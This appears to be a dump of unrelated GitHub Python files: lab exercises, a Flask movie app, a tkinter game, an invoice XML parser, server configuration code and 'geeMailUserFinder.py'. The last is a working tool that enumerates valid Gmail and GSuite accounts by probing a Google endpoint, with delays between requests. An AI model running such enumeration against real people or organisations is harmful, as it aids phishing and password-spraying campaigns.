result[\"axapi_calls\"].append(api_client.switch_device_context(module.client, a10_device_context_id))\n\n existing_config = api_client.get(module.client, existing_url(module))\n result[\"axapi_calls\"].append(existing_config)\n if existing_config['response_body'] != 'NotFound':\n existing_config = existing_config[\"response_body\"]\n else:\n existing_config = None\n\n if state == 'present':\n result = present(module, result, existing_config)\n\n if state == 'absent':\n result = absent(module, result, existing_config)\n\n if state == 'noop':\n if module.params.get(\"get_type\") == \"single\":\n get_result = api_client.get(module.client, existing_url(module))\n result[\"axapi_calls\"].append(get_result)\n info = get_result[\"response_body\"]\n result[\"acos_info\"] = info[\"fast-http-proxy\"] if info != \"NotFound\" else info\n elif module.params.get(\"get_type\") == \"list\":\n get_list_result = api_client.get_list(module.client, existing_url(module))\n result[\"axapi_calls\"].append(get_list_result)\n\n info = get_list_result[\"response_body\"]\n result[\"acos_info\"] = info[\"fast-http-proxy-list\"] if info != \"NotFound\" else info\n elif module.params.get(\"get_type\") == \"oper\":\n get_oper_result = api_client.get_oper(module.client, existing_url(module), params=module.params)\n 
result[\"axapi_calls\"].append(get_oper_result)\n info = get_oper_result[\"response_body\"]\n result[\"acos_info\"] = info[\"fast-http-proxy\"][\"oper\"] if info != \"NotFound\" else info\n elif module.params.get(\"get_type\") == \"stats\":\n get_type_result = api_client.get_stats(module.client, existing_url(module), params=module.params)\n result[\"axapi_calls\"].append(get_type_result)\n info = get_type_result[\"response_body\"]\n result[\"acos_info\"] = info[\"fast-http-proxy\"][\"stats\"] if info != \"NotFound\" else info\n except a10_ex.ACOSException as ex:\n module.fail_json(msg=ex.msg, **result)\n except Exception as gex:\n raise gex\n finally:\n if module.client.auth_session.session_id:\n module.client.auth_session.close()\n\n return result\n\n\ndef main():\n module = AnsibleModule(argument_spec=get_argspec(), supports_check_mode=True)\n result = run_command(module)\n module.exit_json(**result)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"a10networks/a10-acos-axapi","sub_path":"plugins/modules/a10_slb_fast_http_proxy.py","file_name":"a10_slb_fast_http_proxy.py","file_ext":"py","file_size_in_byte":56023,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"53"} +{"seq_id":"37223607955","text":"\"\"\"Lab 2: Expressions and Control Structures\"\"\"\n\n#Fill in your name and surname\nname = \"Andile & Lavender Zandile\"\nsurname = \"Mbele & Tshuma\"\nassignment = \"lab2\"\n\ndef both_positive(x, y):\n \"\"\"Returns True if both x and y are positive.\n\n >>> both_positive(-1, 1)\n False\n >>> both_positive(1, 1)\n True\n \"\"\"\n if x > 0 and y > 0:\n\t return True\n else:\n\t return False\n\ndef sum_digits(n):\n \"\"\"Sum all the digits of n.\n\n >>> sum_digits(10) # 1 + 0 = 1\n 1\n >>> sum_digits(4224) # 4 + 2 + 2 + 4 = 12\n 12\n >>> sum_digits(1234567890)\n 45\n >>> x = sum_digits(123) # make sure that you are using return rather than print\n >>> x\n 6\n \"\"\"\n\n \"\"\"Sum_digits using iteration\"\"\"\n total = 0\n while n > 10:\n remainder = n % 10\n total += remainder\n n = n // 10\n return total + n\n\n \"*** DONE ***\"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"xeroxzen/Bootcamp-Labs","sub_path":"lab2/lab2.py","file_name":"lab2.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5851622837","text":"from core import app\nfrom flask import render_template, request,redirect,url_for\nfrom core.functions import *\n\n#--------------------#\n# R U T A S Y VISTAS\n#--------------------#\n\n#--------------------#\n# P U B L I C A S\n#--------------------#\n\n#Ruta principal \n\n@app.route(\"/\")\ndef principal():\n return render_template(\"public/index.html\",)\n\n#Ruta del login\n\n@app.route(\"/login\")\ndef login():\n return render_template(\"public/login.html\")\n@app.route(\"/user\", methods=['POST'])\n\n#--------------------#\n# P R I V A D A S\n#--------------------#\n\ndef user(): \n parametros = request.form\n #print(\"\\nLOS PARAMETROS SON: \", parametros,\"\\n\")\n username = parametros['username']\n password = parametros['pass']\n if searchUserInJson(username, password, 'database/cuentas.json'):\n return render_template('users/movie_info.html')\n else:\n return render_template('login_user.html')\n\n\n#Ruta para agregar peliculas\n\n@app.route(\"/user/addMovie\", methods=['GET'])\ndef addMovies():\n parametros = request.args\n print (parametros[\"id\"])\n \n url= addMovie(parametros[\"id\"]) \n if url == True:\n 
return redirect(url_for('login'))\n    else:\n        return \"Ha ocurrido un error
\" \n\n\n#Ruta para editar peliculas\n\n@app.route(\"/user/edit_movie\", methods=['GET'])\ndef renderEditMovie():\n parametros = request.args\n print (parametros)\n Id = parametros[\"Id\"]\n infoMovie = getMovieInfoById(Id)\n return render_template(\"users/edit_movie.html\", infoMovie=infoMovie)\n\n\n#Ruta para actualizar la informacion de las peliculas\n\n@app.route(\"/user/update_movie\", methods=['POST','GET'])\ndef updateMovie():\n id=request.args[\"Id\"]\n params = request.form\n print(params['Title'])\n editMovie(id, params['Title'], params['Plot'], params['Director'], params['Genre'], params['Year'],params['Poster'])\n return redirect(url_for('login'))\n\n\n#Ruta para eliminar las peliculas\n\n@app.route(\"/user/delete_movie\", methods=['GET'])\ndef delMovie():\n id=request.args[\"Id\"]\n state = deleteMovie(id)\n if state:\n return redirect(url_for('login'))\n else:\n return \"
Usted no puede borrar peliculas con comentarios
\"","repo_name":"camiloCanclini/proyecto-programacionII-Canclini-Antunez","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16690684735","text":"#程序文件ex9_18.py\r\nimport pandas as pd\r\nimport numpy as np\r\nimport statsmodels.api as sm\r\n\r\na = pd.read_excel('data9_18.xlsx', header=None)\r\nb = a.values.T; y = b[~np.isnan(b)]\r\nx = np.hstack([np.ones(5), np.full(4,2), np.full(4,3), np.full(3,4)])\r\nd = {'x':x, 'y':y} #构造字典\r\nmodel = sm.formula.ols('y~C(x)', d).fit() #构建模型\r\nanovat = sm.stats.anova_lm(model) #进行单因素方差分析\r\nprint(anovat)\r\n\r\n","repo_name":"LuyuZhang00/CUMCM2022","sub_path":"python数学建模算法与应用/09第9章 数据的描述性统计方法/ex9_18.py","file_name":"ex9_18.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"74789843047","text":"from collections import deque\ndef solution(n, computers):\n answer = 0\n \n queue = deque()\n visited = [0 for _ in range(n)]\n \n count = 0\n \n while 0 in visited:\n idx = visited.index(0)\n queue.append(idx)\n visited[idx] = 1\n count += 1\n \n while queue:\n temp = queue.popleft()\n for i in range(n):\n if computers[temp][i] == 1 and visited[i] == 0:\n queue.append(i)\n visited[i] = 1\n \n answer = count\n return answer","repo_name":"deltaori0/Python-Algorithm","sub_path":"programmers/DFS_BFS/네트워크.py","file_name":"네트워크.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41879422297","text":"import random\nfrom tkinter import *\nfrom tkinter import Label\n\nfrom PIL import ImageTk, Image\n\ns = Tk()\nc, ur = 0, 0\n\ns.title('rock paper scissor')\ns.iconbitmap('images/rps.ico')\n\n\ndef playagain_fun2():\n my_.grid_remove()\n com_.grid_remove()\n play_again.grid_remove()\n buttons()\n\n\ndef winner(u, com):\n global printing, ur, c\n if u == com:\n\n printing = Label(s, text=\"it's a draw \")\n printing.grid(row=2, column=0, columnspan=3)\n # printing.pack()\n # print(\"draw\")\n elif u == (\"rock\" and com == \"paper\") or (u == \"paper\" and com == \"scissor\") or (u == \"scissor\" and com == \"rock\"):\n printing = Label(s, text=\"computer won over you \")\n printing.grid(row=2, column=0, columnspan=3)\n c += 1\n # printing.pack()\n # print(\"com won\")\n\n else:\n printing = Label(s, text=\"you won over computer \")\n printing.grid(row=2, column=0, columnspan=3)\n ur += 1\n\n\ndef computer_choice():\n a = [(\"rock\", rock_img), (\"paper\", paper_img), (\"scissor\", scissor_img)]\n com = random.choice(a)\n return com\n\n\ndef rock_fun():\n global my1, my, comp, vs, comp1\n com = computer_choice()\n my = Label(s, text=\"your choice\")\n my.grid(row=0, column=0)\n my1 = Label(s, image=rock_img)\n my1.grid(row=1, column=0)\n\n vs = Label(s, image=vs_img)\n vs.grid(row=1, column=1)\n\n comp = Label(s, text=\"computer's choice\")\n comp.grid(row=0, column=2)\n comp1 = Label(s, image=com[1])\n comp1.grid(row=1, column=2)\n\n winner(\"rock\", com[0])\n\n rock.grid_remove()\n paper.grid_remove()\n scissor.grid_remove()\n play()\n\n\ndef paper_fun():\n global my1, my, comp, vs, comp1\n\n com = computer_choice()\n my = Label(s, text=\"your choice\")\n my.grid(row=0, column=0)\n my1 = Label(s, image=paper_img)\n my1.grid(row=1, column=0)\n\n vs = Label(s, image=vs_img)\n vs.grid(row=1, column=1)\n\n comp = Label(s, 
text=\"computer's choice\")\n comp.grid(row=0, column=2)\n comp1 = Label(s, image=com[1])\n comp1.grid(row=1, column=2)\n\n winner(\"paper\", com[0])\n\n rock.grid_remove()\n paper.grid_remove()\n scissor.grid_remove()\n play()\n\n\ndef scissor_fun():\n global my1, my, comp, vs, comp1\n com = computer_choice()\n my = Label(s, text=\"your choice\")\n my.grid(row=0, column=0)\n my1 = Label(s, image=scissor_img)\n my1.grid(row=1, column=0)\n\n vs = Label(s, image=vs_img)\n vs.grid(row=1, column=1)\n\n comp = Label(s, text=\"computer's choice\")\n comp.grid(row=0, column=2)\n comp1 = Label(s, image=com[1])\n comp1.grid(row=1, column=2)\n\n winner(\"scissor\", com[0])\n\n rock.grid_remove()\n paper.grid_remove()\n scissor.grid_remove()\n play()\n\n\ndef playagain_fun():\n my.grid_remove()\n comp.grid_remove()\n my1.grid_remove()\n comp1.grid_remove()\n printing.grid_remove()\n buttons()\n playagain.grid_remove()\n score.grid_remove()\n vs.grid_remove()\n\n\ndef score_fun():\n global my_, com_, play_again\n score.grid_remove()\n my.grid_remove()\n my1.grid_remove()\n comp.grid_remove()\n comp1.grid_remove()\n vs.grid_remove()\n printing.grid_remove()\n playagain.grid_remove()\n text = \"yours score \\n\" + str(ur)\n\n my_ = Label(s, text=text)\n my_.grid(row=0, column=0)\n\n text = \"computer's score \\n\" + str(c)\n\n com_ = Label(s, text=text)\n com_.grid(row=0, column=2)\n\n play_again = Button(s, image=play_img, command=playagain_fun2, borderwidth=0)\n play_again.grid(row=3, column=0, columnspan=3)\n\n\ndef play():\n global playagain, score\n playagain = Button(s, image=play_img, command=playagain_fun, borderwidth=0)\n playagain.grid(row=3, column=0, columnspan=3)\n\n score = Button(s, image=score_img, command=score_fun, borderwidth=0)\n score.grid(row=4, column=0, columnspan=3)\n\n\ndef buttons():\n global rock, paper, scissor, playagain, score\n Label(s).grid(row=0, column=0)\n rock = Button(s, image=rock_img, command=rock_fun, padx=20, borderwidth=0)\n rock.grid(row=1, column=0, rowspan=2)\n\n paper = Button(s, image=paper_img, command=paper_fun, padx=20, borderwidth=0)\n paper.grid(row=1, column=1, rowspan=2)\n\n scissor = Button(s, image=scissor_img, command=scissor_fun, padx=20, borderwidth=0)\n scissor.grid(row=1, column=2, rowspan=2)\n\n\nrock_img = ImageTk.PhotoImage(Image.open(\"images/rock.png\"))\n\npaper_img = ImageTk.PhotoImage(Image.open(\"images/paper.png\"))\n\nscissor_img = ImageTk.PhotoImage(Image.open(\"images/scissor.png\"))\n\nplay_img = ImageTk.PhotoImage(Image.open(\"images/playagain.png\"))\n\nvs_img = ImageTk.PhotoImage(Image.open(\"images/vs.png\"))\n\nscore_img = ImageTk.PhotoImage(Image.open(\"images/score1.png\"))\n\nexits = Button(s, text=\"exit\", command=s.quit, bg=\"red\", fg=\"white\", borderwidth=0, padx=50, pady=5)\nexits.grid(row=5, column=0, columnspan=3)\n\nbuttons()\ns.mainloop()\n","repo_name":"garuda0py/rps","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":4828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14333655515","text":"import os\nimport typing as T\n\nimport fastapi\nimport starlette.staticfiles\n\nfrom .api import api\nfrom .lambdas import lambdas\nfrom .s3proxy import s3proxy\n\nREG_PREFIX = \"/__reg\"\nLAMBDA_PREFIX = \"/__lambda\"\nS3_PROXY_PREFIX = \"/__s3proxy\"\nCATALOG_BUNDLE = os.getenv(\"QUILT_CATALOG_BUNDLE\")\nCATALOG_URL = os.getenv(\"QUILT_CATALOG_URL\")\n\napp = fastapi.FastAPI()\n\n\nclass SPA(starlette.staticfiles.StaticFiles):\n 
def __init__(self, directory: T.Optional[os.PathLike] = None, index='index.html') -> None:\n self.index = index\n if not directory:\n directory = os.path.join(os.path.dirname(__file__), \"catalog_bundle\")\n super().__init__(directory=directory, packages=None, html=True, check_dir=True)\n\n async def lookup_path(self, path: str) -> T.Tuple[str, os.stat_result]:\n full_path, stat_result = await super().lookup_path(path)\n\n # return index if a file cannot be found\n if stat_result is None:\n return await super().lookup_path(self.index)\n\n return (full_path, stat_result)\n\n\n@app.get(\"/config.json\")\ndef config():\n return {\n \"alwaysRequiresAuth\": False,\n \"analyticsBucket\": \"\",\n \"apiGatewayEndpoint\": LAMBDA_PREFIX,\n \"binaryApiGatewayEndpoint\": LAMBDA_PREFIX,\n \"googleClientId\": \"\",\n \"mixpanelToken\": \"\",\n \"mode\": \"LOCAL\",\n \"noDownload\": True,\n \"oktaBaseUrl\": \"\",\n \"oktaClientId\": \"\",\n \"oneLoginBaseUrl\": \"\",\n \"oneLoginClientId\": \"\",\n \"passwordAuth\": \"DISABLED\",\n \"registryUrl\": REG_PREFIX,\n \"s3Proxy\": S3_PROXY_PREFIX,\n \"sentryDSN\": \"\",\n \"serviceBucket\": \"\",\n \"signInRedirect\": \"/\",\n \"signOutRedirect\": \"/\",\n \"ssoAuth\": \"DISABLED\",\n \"ssoProviders\": \"\",\n }\n\n\napp.mount(REG_PREFIX, api, \"API\")\napp.mount(LAMBDA_PREFIX, lambdas, \"Lambda\")\napp.mount(S3_PROXY_PREFIX, s3proxy, \"S3 Proxy\")\n\nif CATALOG_URL:\n # to avoid long-polling connections preventing server restarts\n @app.get(\"/__webpack_hmr\")\n def webpack_hmr():\n return starlette.responses.Response(status_code=404)\n\n from asgiproxy.__main__ import make_app as make_proxy_app\n\n proxy_app, proxy_context = make_proxy_app(upstream_base_url=CATALOG_URL)\n app.mount(\"/\", proxy_app, \"SPAProxy\")\n\n @app.on_event(\"shutdown\")\n async def on_shutdown():\n await proxy_context.close()\n\nelse:\n app.mount(\"/\", SPA(directory=CATALOG_BUNDLE), \"SPA\")\n\n\ndef run():\n try:\n import uvicorn\n except ImportError:\n print(\"Please install uvicorn to run a development server.\")\n import sys\n sys.exit(0)\n\n uvicorn.run(\n \"quilt3_local.main:app\",\n port=int(os.getenv(\"PORT\", \"3000\")),\n reload=True,\n )\n","repo_name":"quiltdata/local","sub_path":"quilt3_local/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"20074607893","text":"import urllib.request\n\nurl=\"http://weather.noaa.gov/pub/data/observations/metar/decoded/EGLL.TXT\"\nweatherData = urllib.request.urlopen(url).read().decode('utf-8')\n\n# Waeather data\nfor line in weatherData.split('\\n'):\n print(line)\n\n# Challenge\n# ======================================================================\n# Find the current weather in london\n\n\n\n\n\n\n# Useful functions\n# ======================================================================\ndemo = 'name: number'\ndemoList = demo.split(':')\nprint(demoList)","repo_name":"hpgmiskin/python-essentials","sub_path":"download_weather.py","file_name":"download_weather.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72030864488","text":"myString=\"hello\"\nmyFloat=10.0\nmyInt=20\n\nif myString == \"hello\":\n print(\"String: %s\" % myString)\nif isinstance(myFloat, float) and myFloat == 10.0:\n print(\"Float: %f\" % myFloat)\nif isinstance(myInt, int) and myInt == 20:\n print(\"Integer: %d\" % 
myInt)\n\nmyList = [1,2,3]\nmyList.append(myFloat)\n\nfor x in myList:\n print(x)\n\nname = \"Damien\"\nage = 38\n\nprint(\"Name %s, age %d\" % (name, age))\n\n# python -m unittest discover test/arrays/ -v\n","repo_name":"damien-neveu/algo-study","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20925218114","text":"import pandas as pd\nimport bs4\nimport re\ndef xmll(ruta):\n with open(ruta) as page:\n soup = bs4.BeautifulSoup(page, 'xml')\n nameFile=re.findall(r\"(\\d{9,}.+)\\.\",ruta)[0]\n nameFile_ext=f\"{nameFile}.xml\"\n suplierOb=soup.find('cac:AccountingSupplierParty')\n rucSupplier=suplierOb.find('cbc:CustomerAssignedAccountID').text\n nameSupplier=suplierOb.find('cbc:Name').text.strip()\n totalPriceAmount=soup.find('cbc:PayableAmount').text\n netPriceAmount=soup.find('cbc:PriceAmount').text\n emissionDate=soup.find('cbc:IssueDate').text\n vouchNumber=re.findall(r\"_(\\d+).xml\",ruta)[0]\n lettersAmount=soup.find('cbc:Note').text\n lettersAmount=re.findall(r\"(.+)SOLES\",lettersAmount)[0].strip()\n serialNumber=soup.find('cac:OrderReference').find('cbc:ID').text\n serialNumber=re.findall(r\"(E\\d+)-\\d+\",serialNumber)[0].strip()\n rucClient=soup.find('cac:AccountingCustomerParty').find('cbc:CustomerAssignedAccountID').text\n nameClient=soup.find('cac:AccountingCustomerParty').find('cac:Party').find('cac:PartyName').find('cbc:Name').text.strip()\n typeDocument=re.findall(r\"_(\\d+)_\",ruta)[0]\n \n supplierInfoList=[]\n supplierInfo={\n 'nameFile':nameFile_ext,\n 'nameFilee':nameFile,\n 'RUC EMISOR':rucSupplier,\n 'NOMBRE EMISOR':nameSupplier,\n 'PRECIO TOTAL BRUTO':totalPriceAmount,\n 'PRECIO TOTAL NETO':netPriceAmount,\n 'FECHA DE EMISION':\"'\"+str(emissionDate),\n 'RUC RECEPTOR':rucClient,\n 'NOMBRE RECEPTOR':nameClient,\n 'PRECIO LETRAS':lettersAmount,\n 'NUMERO COMPROBATE':vouchNumber,\n 'SERIE':serialNumber,\n 'TIPO DOCUMENTO':typeDocument,\n }\n supplierInfoList.append(supplierInfo)\n return supplierInfo\n#df=pd.DataFrame(list(supplierInfoList))\n#print(df)\n#print(xmll(r\"xmlFolder\\10480238011_02_E001_20.xml\"))\n","repo_name":"danielichis/pdf_xmls_validators","sub_path":"parseXml.py","file_name":"parseXml.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74189684646","text":"#!/usr/bin/python3\r\nimport re\r\nimport requests as request_handler\r\nimport argparse\r\nimport textwrap\r\nimport sys\r\nimport time\r\nfrom colorama import Fore, Style, init\r\n\r\ndef definitions():\r\n global info, close, success, fail\r\n info, fail, close, success = Fore.YELLOW + Style.BRIGHT, Fore.RED + \\\r\n Style.BRIGHT, Style.RESET_ALL, Fore.GREEN + Style.BRIGHT\r\n\r\ndef banner():\r\n print(Fore.YELLOW + Style.BRIGHT + \"\")\r\n print(' __ ___ _ __ __ __ _______ __ ') \r\n print(' ____ ____ ___ / |/ /___ _(_) / / / / /_______ _____ / ____(_)___ ____/ /__ _____')\r\n print(' / __ `/ _ \\/ _ \\/ /|_/ / __ `/ / / / / / / ___/ _ \\/ ___/ / /_ / / __ \\/ __ / _ \\/ ___/')\r\n print(' / /_/ / __/ __/ / / / /_/ / / / / /_/ (__ ) __/ / / __/ / / / / / /_/ / __/ / ')\r\n print(' \\__, /\\___/\\___/_/ /_/\\__,_/_/_/ \\____/____/\\___/_/ /_/ /_/_/ /_/\\__,_/\\___/_/ ')\r\n print('/____/ ')\r\n print(\" Version 1.0.0 \")\r\n print(\" A project by The Mayor \")\r\n print(\" geeMailUserFinder.py -h to get started \\n\" + Style.RESET_ALL)\r\n 
print(\"-\" * 90)\r\n\r\n\r\ndef options():\r\n opt_parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, epilog=textwrap.dedent(\r\n '''\r\n---Validate a single email---\r\npython3 geeMailUserFinder.py -e test@test.com\\n\r\n---Validate a list of emails and write to file---\r\npython3 geeMailUserFinder.py -r testemails.txt -w valid.txt\\n\r\n---Validate a list of emails, write to file and timeout between requests---\r\npython3 geeMailUserFinder.py -r emails.txt -w validemails.txt -t 30\\n\r\n---Validate a list of emails and timeout between requests---\r\npython3 geeMailUserFinder.py -r emails.txt -t 30\\n\r\n---Validate a list of emails using verbose mode---\r\npython3 geeMailUserFinder.py -r emails.txt -v\\n\r\n'''))\r\n opt_parser.add_argument(\r\n '-e', '--email', help='Runs geeMailUserFinder against a single email')\r\n opt_parser.add_argument(\r\n '-r', '--read', help='Reads email addresses from file')\r\n opt_parser.add_argument(\r\n '-w', '--write', help='Writes valid emails to text file')\r\n opt_parser.add_argument(\r\n '-t', '--timeout', help='Set timeout between checks.')\r\n opt_parser.add_argument(\r\n '-v', '--verbose', help='Verbose mode', action='store_true')\r\n opt_parser.add_argument('-u', '--userlist', help='Reads usernames from file')\r\n opt_parser.add_argument('-d', '--domain', help='Uses manually entered domain.')\r\n opt_parser.add_argument('-c', '--checkdomain', help='Checks if domain is valid. Requires -d ', action='store_false')\r\n global args\r\n args = opt_parser.parse_args()\r\n if len(sys.argv) == 1:\r\n opt_parser.print_help()\r\n opt_parser.exit()\r\n\r\ndef handler():\r\n if args.read and args.userlist and args.email is not None or args.read and args.userlist is not None:\r\n print(fail + '\\n[-] Please select only one option and try again.') \r\n sys.exit()\r\n if args.email is not None:\r\n single_test()\r\n if args.read is not None:\r\n gmail_test()\r\n if args.userlist is not None:\r\n gmail_users()\r\n if args.checkdomain is not None and args.domain is None:\r\n print(fail + '\\n[-] Please enter a domain to check. -c -d ')\r\n sys.exit()\r\n if args.checkdomain is not None and args.domain is not None and args.email is None: \r\n domain_test()\r\n \r\n\r\n\r\n\r\ndef single_test():\r\n if args.email is not None:\r\n email = args.email\r\n url = \"https://mail.google.com/mail/gxlu?email=\" + email + \"&zx=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\"\r\n request = request_handler.head(url)\r\n response = request.text\r\n cook_check = str(request.cookies.get_dict())\r\n valid_response = re.search(\"'COMPASS':\", cook_check)\r\n if args.verbose is not None:\r\n print(request.status_code, response)\r\n if valid_response:\r\n print(success + f'\\n[!] {email} - Valid Gmail account!')\r\n else:\r\n print(fail + f'\\n[-] {email} - Invalid Gmail account.')\r\n else:\r\n pass\r\n\r\ndef gmail_test():\r\n # counter = 0\r\n if args.read is not None: \r\n with open(args.read, 'r') as line_count:\r\n lines = len(line_count.readlines())\r\n print(info + f'\\n[!] 
Loading {lines} emails to test.\\n')\r\n with open(args.read, 'r') as f:\r\n counter = 0\r\n for line in f:\r\n email = line.split()\r\n email = ' '.join(email)\r\n url = \"https://mail.google.com/mail/gxlu?email=\" + email + \"&zx=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\"\r\n request = request_handler.get(url)\r\n cook_check = str(request.cookies.get_dict())\r\n valid_response = re.search(\"'COMPASS':\", cook_check)\r\n if args.verbose:\r\n print('\\n',email, url, request, request.status_code)\r\n if valid_response:\r\n b = \" Result - Valid Email Found! [+]\"\r\n print(success + f'[+] {email:53} {b}' + Style.RESET_ALL)\r\n counter = counter + 1\r\n if args.write is not None:\r\n with open(args.write, 'a') as valid_emails:\r\n valid_emails.write(f\"{email}\\n\")\r\n else:\r\n b = \" Result - Invalid Email Found! [-]\"\r\n print(fail + f'[-] {email:53} {b}' + Style.RESET_ALL)\r\n if args.timeout is not None:\r\n time.sleep(int(args.timeout))\r\n if counter == 0:\r\n print(\r\n fail + '\\n[-] There were no valid logins found. [-]' + close)\r\n if counter == 1:\r\n print(\r\n info + '\\n[info] geeMail User Finder discovered one valid login account.' + close)\r\n if counter > 1:\r\n print(\r\n info + f'\\n[info] geeMail User Finder discovered {counter} valid login accounts.' + close)\r\n\r\n else:\r\n pass\r\n\r\ndef gmail_users():\r\n # counter = 0\r\n print(info + f'\\n [!] Checking if target domain uses GSuite.')\r\n domain_test()\r\n if args.userlist is not None: \r\n with open(args.userlist, 'r') as line_count:\r\n lines = len(line_count.readlines())\r\n print(info + f'\\n[!] Loading {lines} usernames to test.\\n')\r\n with open(args.userlist, 'r') as f:\r\n counter = 0\r\n for line in f:\r\n username = line.split()\r\n username = ' '.join(username)\r\n email = username + '@' + args.domain\r\n url = \"https://mail.google.com/mail/gxlu?email=\" + email + \"&zx=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\"\r\n request = request_handler.get(url)\r\n cook_check = str(request.cookies.get_dict())\r\n valid_response = re.search(\"'COMPASS':\", cook_check)\r\n if args.verbose:\r\n print('\\n',email, url, request, request.status_code)\r\n if valid_response:\r\n b = \" Result - Valid Email Found! [+]\"\r\n print(success + f'[+] {email:53} {b}')\r\n counter = counter + 1\r\n if args.write is not None:\r\n with open(args.write, 'a') as valid_emails:\r\n valid_emails.write(f\"{email}\\n\")\r\n else:\r\n b = \" Result - Invalid Email Found! [-]\"\r\n print(fail + f'[-] {email:53} {b}')\r\n if args.timeout is not None:\r\n time.sleep(int(args.timeout))\r\n if counter == 0:\r\n print(\r\n fail + '\\n[-] There were no valid logins found. [-]' + close)\r\n if counter == 1:\r\n print(\r\n info + '\\n[info] geeMail User Finder discovered one valid login account.' + close)\r\n if counter > 1:\r\n print(\r\n info + f'\\n[info] geeMail User Finder discovered {counter} valid login accounts.' 
+ close)\r\n\r\n else:\r\n pass\r\n\r\ndef domain_test():\r\n domain = args.domain\r\n url = f'https://www.google.com/a/{domain}/ServiceLogin?https://docs.google.com/a/{domain}'\r\n request = request_handler.get(url)\r\n re.search(\"Server error\", request.text)\r\n if args.verbose:\r\n print(request.text) \r\n if re.search(\"Server error\", request.text):\r\n print(fail + f'\\n[-] {domain} - Invalid GSuite domain!')\r\n else:\r\n print(success + f'\\n[+] {domain} - Valid GSuite domain!')\r\n\r\nif __name__ == '__main__':\r\n try:\r\n init()\r\n definitions()\r\n banner()\r\n options()\r\n print(Fore.YELLOW + Style.BRIGHT +\r\n f'\\n[info] Starting geeMail User Finder at {time.ctime()}' + Style.RESET_ALL) \r\n handler()\r\n # single_test()\r\n # gmail_test()\r\n # gmail_users()\r\n print(\r\n info + f'\\n[info] Scan completed at {time.ctime()}\\n' + close)\r\n except KeyboardInterrupt:\r\n print(fail + '\\n[-] User Interrupt. [-]' + close)\r\n print(\r\n info + f'\\n[info] Scan completed at {time.ctime()}\\n' + close)\r\n sys.exit()\r\n except FileNotFoundError:\r\n print(fail + '\\n[-] File not found. Check filename and try again [-]' + close)\r\n","repo_name":"dievus/geeMailUserFinder","sub_path":"geeMailUserFinder.py","file_name":"geeMailUserFinder.py","file_ext":"py","file_size_in_byte":9844,"program_lang":"python","lang":"en","doc_type":"code","stars":101,"dataset":"github-code","pt":"53"} +{"seq_id":"294362598","text":"\"\"\"FastAPI dependencies\"\"\"\nfrom typing import Generator\n\nfrom botocore.exceptions import ClientError\nfrom fastapi import Depends, HTTPException\nfrom fastapi.security.api_key import APIKeyHeader\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm.session import Session\nfrom starlette.status import HTTP_403_FORBIDDEN\n\nfrom altimeter.core.log import Singleton\nfrom altimeter.qj.config import APIServiceConfig, DBConfig\nfrom altimeter.qj.crud.crud_job import CRUDJob\nfrom altimeter.qj.crud.crud_result_set import CRUDResultSet\nfrom altimeter.qj.notifier import ResultSetNotifier\nfrom altimeter.qj.security import get_api_key\nfrom altimeter.qj.settings import API_KEY_HEADER_NAME\n\n\n# pylint: disable=too-few-public-methods\nclass SessionGenerator(metaclass=Singleton):\n \"\"\"Singleton class for generating db sesssions\"\"\"\n\n def __init__(self) -> None:\n db_config = DBConfig()\n self._engine = create_engine(db_config.get_db_uri(), pool_pre_ping=True, pool_recycle=3600)\n\n def get_session(self) -> Session:\n \"\"\"Get a db session object\"\"\"\n return Session(autocommit=False, autoflush=False, bind=self._engine)\n\n\ndef db_session() -> Generator[Session, None, None]:\n \"\"\"Get a db session\"\"\"\n try:\n session = SessionGenerator().get_session()\n yield session\n finally:\n session.close()\n\n\ndef job_crud() -> CRUDJob:\n \"\"\"Get a CRUDJob object\"\"\"\n api_svc_config = APIServiceConfig()\n return CRUDJob(\n db_ro_user=api_svc_config.db_ro_user,\n result_expiration_sec_default=api_svc_config.result_expiration_sec_default,\n result_expiration_sec_limit=api_svc_config.result_expiration_sec_limit,\n max_graph_age_sec_default=api_svc_config.max_graph_age_sec_default,\n max_graph_age_sec_limit=api_svc_config.max_graph_age_sec_limit,\n max_result_age_sec_default=api_svc_config.max_result_age_sec_default,\n max_result_age_sec_limit=api_svc_config.max_result_age_sec_limit,\n account_id_key=api_svc_config.account_id_key,\n )\n\n\ndef result_set_crud() -> CRUDResultSet:\n \"\"\"Get a CRUDResultSet object\"\"\"\n api_svc_config = APIServiceConfig()\n 
